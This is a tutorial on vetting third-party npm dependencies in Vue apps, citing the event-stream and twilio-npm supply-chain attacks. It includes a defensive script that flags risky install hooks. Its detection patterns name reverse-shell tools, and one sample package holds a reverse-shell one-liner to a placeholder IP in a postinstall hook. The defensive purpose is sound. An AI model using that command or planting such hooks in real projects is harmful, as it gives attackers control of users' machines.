
Third-Party Libraries

Explore best practices for using third-party libraries in Vue applications with a focus on security. Understand how to vet dependencies, lock versions to avoid breaking changes, and utilize vulnerability scanning tools like npm audit to protect your app from malicious code and maintain safe, reliable functionality.


Can we use third-party libraries?

Nowadays, it’s very common to install a new dependency whenever a specific piece of functionality is needed. Do we need a fancy multiselect? Let’s check npm for packages. How about tooltip components? Let’s head to npm.

Third-party libraries are very useful because, instead of starting from scratch, we can pick a library, plug it in, and have working functionality. There’s no need to write or maintain that code ourselves; someone else does that job. Open source is great, but it can occasionally backfire.

For instance, in 2018, malicious code was found in the npm package event-stream: a new maintainer had added a dependency, flatmap-stream, that carried a hidden payload. The infected version was downloaded around 8 million times within 2.5 months. The payload targeted users of the Copay bitcoin wallet and was designed to steal their wallet credentials and funds. Another example is twilio-npm, a malicious package discovered in 2020 that impersonated Twilio’s official library. When installed, it opened a TCP reverse shell to an attacker-controlled server and then waited for commands to run on the infected user’s computer. What can we do to protect ourselves from malicious code?
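One concrete check that follows from the twilio-npm case above, as an added example rather than code from the original lesson: the hooks npm runs automatically during install (preinstall, install, postinstall) are exactly where a package can execute code on a developer’s machine, so inspect them before adding a dependency. The script below reads a package’s metadata (the package.json you get from `npm pack <name>` or from the registry), reports every install hook, and flags commands that look like a reverse shell, a remote download, or obfuscation. The indicator list is an assumption made for this example, and the three sample packages (including the IP address, which is from the documentation range) are constructed, not real.

```javascript
// Added example, not code from the original lesson. A pre-install check for the
// lifecycle hooks npm runs automatically during `npm install`: the mechanism a
// malicious package can use to execute code on a developer's machine. Feed it
// the package.json from a fetched tarball (e.g. `npm pack <name>`) before the
// package is added to your project.

// Hooks npm executes for a package installed from the registry.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Indicators that are rarely legitimate in an install script. This list is an
// assumption made for the example; extend it for your environment.
const INDICATORS = [
  { name: "reverse-shell", re: /\/dev\/tcp\/|\bnc\b[^|]*-e|bash -i|net\.connect|\.createConnection/i },
  { name: "remote-fetch",  re: /\bcurl\b|\bwget\b|https?:\/\//i },
  { name: "shell-exec",    re: /child_process|\beval\(|\bexec(Sync)?\(/i },
  { name: "obfuscation",   re: /base64|\\x[0-9a-f]{2}|fromCharCode/i },
];

// Returns one finding per install hook present, each with the indicator names
// it matched, plus an overall risk label:
//   "none"   - no install hooks at all
//   "review" - hooks present but nothing suspicious (native builds look like this)
//   "high"   - a hook matched at least one indicator
function auditInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = INSTALL_HOOKS
    .filter((hook) => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map((hook) => {
      const command = String(scripts[hook]);
      const flags = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
      return { hook, command, flags };
    });
  let risk = "none";
  if (findings.length) risk = findings.some((f) => f.flags.length) ? "high" : "review";
  return { name: pkg.name, version: pkg.version, risk, findings };
}

// Constructed sample metadata for the demonstration (not real packages).
const SAMPLES = [
  { name: "plain-component-lib", version: "1.2.0", scripts: { build: "vite build" } },
  { name: "native-addon", version: "3.0.1", scripts: { postinstall: "node-gyp rebuild" } },
  {
    name: "tw1lio-helper",
    version: "1.0.0",
    scripts: {
      // Typical reverse-shell one-liner hidden in a postinstall hook.
      postinstall:
        "node -e \"require('child_process').exec('bash -i >& /dev/tcp/198.51.100.7/4444 0>&1')\"",
    },
  },
];

for (const pkg of SAMPLES) {
  const r = auditInstallScripts(pkg);
  console.log(`${r.name}@${r.version}: ${r.risk}`);
  for (const f of r.findings) {
    const tags = f.flags.length ? ` [${f.flags.join(", ")}]` : "";
    console.log(`  ${f.hook}: ${f.command}${tags}`);
  }
}
```

A "review" result is not a verdict: packages with native code legitimately run `node-gyp` in postinstall, so read the command rather than rejecting it outright. The check complements, not replaces, a committed lockfile installed with `npm ci` and a regular `npm audit`; if your project never needs install hooks at all, setting `ignore-scripts=true` in `.npmrc` disables them entirely.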